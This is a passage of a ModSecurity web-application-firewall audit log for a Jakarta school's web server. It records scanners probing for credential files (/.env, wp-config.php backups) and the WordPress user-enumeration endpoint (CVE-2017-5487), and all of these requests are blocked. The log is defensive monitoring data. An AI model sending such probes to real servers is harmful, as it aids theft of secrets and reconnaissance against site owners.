"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301780534763 786 (- - -) Stopwatch2: 1749301780534763 786; combined=305, p1=265, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a68e4f1d-Z-- --16f5665c-A-- [07/Jun/2025:20:09:42 +0700] aEQ6FvClubEPOra_8Uk17gAAAAc 103.236.140.4 32942 103.236.140.4 8181 --16f5665c-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --16f5665c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16f5665c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301782421052 728 (- - -) Stopwatch2: 1749301782421052 728; combined=299, p1=258, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16f5665c-Z-- --3ca8d239-A-- [07/Jun/2025:20:09:43 +0700] aEQ6F_ClubEPOra_8Uk19QAAAAA 103.236.140.4 32956 103.236.140.4 8181 --3ca8d239-B-- GET /wp-config.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3ca8d239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ca8d239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301783740219 694 (- - -) Stopwatch2: 1749301783740219 694; combined=271, p1=235, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ca8d239-Z-- --f1fbe52d-A-- [07/Jun/2025:20:14:47 +0700] aEQ7RxK9gc79coX6mHS2tAAAAEs 103.236.140.4 32968 103.236.140.4 8181 --f1fbe52d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.236.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.236.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f1fbe52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1fbe52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749302087711882 3376 (- - -) Stopwatch2: 1749302087711882 3376; combined=1475, p1=512, p2=921, p3=0, p4=0, p5=42, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1fbe52d-Z-- --f948f63b-A-- [07/Jun/2025:21:35:16 +0700] aEROJPClubEPOra_8Uk2LgAAAA4 103.236.140.4 33392 103.236.140.4 8181 --f948f63b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 67.207.87.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 67.207.87.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 Accept-Charset: utf-8 --f948f63b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f948f63b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749306916166598 878 (- - -) Stopwatch2: 1749306916166598 878; combined=343, p1=299, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f948f63b-Z-- --ec496428-A-- [07/Jun/2025:21:44:08 +0700] aERQOGCOO9DrcKL2J_4odwAAANE 103.236.140.4 33504 103.236.140.4 8181 --ec496428-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.229.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.229.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ec496428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec496428-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749307448451307 788 (- - -) Stopwatch2: 1749307448451307 788; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec496428-Z-- --239d8e69-A-- [07/Jun/2025:21:48:40 +0700] aERRSBK9gc79coX6mHS25QAAAFU 103.236.140.4 33548 103.236.140.4 8181 --239d8e69-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --239d8e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --239d8e69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749307720912846 3471 (- - -) Stopwatch2: 1749307720912846 3471; combined=1504, p1=515, p2=951, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --239d8e69-Z-- --900e380f-A-- [07/Jun/2025:23:09:19 +0700] aERkLxK9gc79coX6mHS-dwAAAFI 103.236.140.4 36924 103.236.140.4 8181 --900e380f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.47.28.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.47.28.136 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --900e380f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --900e380f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312559816497 1109 (- - -) Stopwatch2: 1749312559816497 1109; combined=516, p1=395, p2=0, p3=0, p4=0, p5=121, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --900e380f-Z-- --73a62a31-A-- [07/Jun/2025:23:09:21 +0700] aERkMfClubEPOra_8Uk_2gAAABc 103.236.140.4 36926 103.236.140.4 8181 --73a62a31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.47.28.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.47.28.140 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --73a62a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73a62a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312561717865 734 (- - -) Stopwatch2: 1749312561717865 734; combined=340, p1=232, p2=0, p3=0, p4=0, p5=108, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73a62a31-Z-- --c0a1d747-A-- [07/Jun/2025:23:10:04 +0700] aERkXGCOO9DrcKL2J_4wogAAANA 103.236.140.4 36928 103.236.140.4 8181 --c0a1d747-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c0a1d747-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0a1d747-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312604649655 806 (- - -) Stopwatch2: 1749312604649655 806; combined=324, p1=281, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0a1d747-Z-- --09d0715b-A-- [07/Jun/2025:23:10:05 +0700] aERkXRK9gc79coX6mHS-eAAAAEo 103.236.140.4 36932 103.236.140.4 8181 --09d0715b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --09d0715b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09d0715b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312605338004 670 (- - -) Stopwatch2: 1749312605338004 670; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09d0715b-Z-- --cf2add5c-A-- [07/Jun/2025:23:16:32 +0700] aERl4BK9gc79coX6mHS-fwAAAFA 103.236.140.4 36962 103.236.140.4 8181 --cf2add5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --cf2add5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf2add5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312992585551 750 (- - -) Stopwatch2: 1749312992585551 750; combined=304, p1=268, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf2add5c-Z-- --f112e54d-A-- [07/Jun/2025:23:23:52 +0700] aERnmBK9gc79coX6mHS-iQAAAEU 103.236.140.4 37066 103.236.140.4 8181 --f112e54d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; d-02K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Safari/537.36 Accept-Charset: utf-8 --f112e54d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f112e54d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749313432169517 981 (- - -) Stopwatch2: 1749313432169517 981; combined=365, p1=309, p2=0, p3=0, p4=0, p5=56, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f112e54d-Z-- --f6843b24-A-- [07/Jun/2025:23:24:26 +0700] aERnuhK9gc79coX6mHS-igAAAEA 103.236.140.4 37102 103.236.140.4 8181 --f6843b24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Accept-Charset: utf-8 --f6843b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6843b24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749313466514512 871 (- - -) Stopwatch2: 1749313466514512 871; combined=353, p1=310, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6843b24-Z-- --e93e4836-A-- [08/Jun/2025:00:03:35 +0700] aERw52COO9DrcKL2J_4ynAAAAM8 103.236.140.4 43426 103.236.140.4 8181 --e93e4836-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (Windows; U; MSIE 7.0; Windows NT 6.0; .NET CLR 1.0.40727; Media Center PC 4.0; InfoPath.1; en-NZ) Accept-Charset: utf-8 --e93e4836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93e4836-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749315815911998 859 (- - -) Stopwatch2: 1749315815911998 859; combined=394, p1=338, p2=0, p3=0, p4=0, p5=55, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93e4836-Z-- --bd1d4570-A-- [08/Jun/2025:00:56:51 +0700] aER9Y2COO9DrcKL2J_4ypQAAAMU 103.236.140.4 43800 103.236.140.4 8181 --bd1d4570-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --bd1d4570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1d4570-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749319011904001 839 (- - -) Stopwatch2: 1749319011904001 839; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1d4570-Z-- --a6ed465e-A-- [08/Jun/2025:01:10:59 +0700] aESAs2COO9DrcKL2J_4yvAAAAM8 103.236.140.4 44304 103.236.140.4 8181 --a6ed465e-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) Accept-Charset: utf-8 --a6ed465e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ed465e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749319859942657 872 (- - -) Stopwatch2: 1749319859942657 872; combined=369, p1=313, p2=0, p3=0, p4=0, p5=55, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ed465e-Z-- --0842b04d-A-- [08/Jun/2025:01:23:08 +0700] aESDjJANhDjQAvBdMyEL6gAAAJM 103.236.140.4 44462 103.236.140.4 8181 --0842b04d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.156.1.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.156.1.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0842b04d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0842b04d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749320588426596 2775 (- - -) Stopwatch2: 1749320588426596 2775; combined=1247, p1=422, p2=793, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0842b04d-Z-- --ffe11731-A-- [08/Jun/2025:01:33:32 +0700] aESF_BK9gc79coX6mHTAXQAAAE8 103.236.140.4 44500 103.236.140.4 8181 --ffe11731-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Accept-Charset: utf-8 --ffe11731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffe11731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749321212403864 641 (- - -) Stopwatch2: 1749321212403864 641; combined=271, p1=231, p2=0, p3=0, p4=0, p5=40, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffe11731-Z-- --a485a923-A-- [08/Jun/2025:01:56:43 +0700] aESLa5ANhDjQAvBdMyEMEgAAAJI 103.236.140.4 44656 103.236.140.4 8181 --a485a923-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SPH-L710 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --a485a923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a485a923-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322603486305 809 (- - -) Stopwatch2: 1749322603486305 809; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: 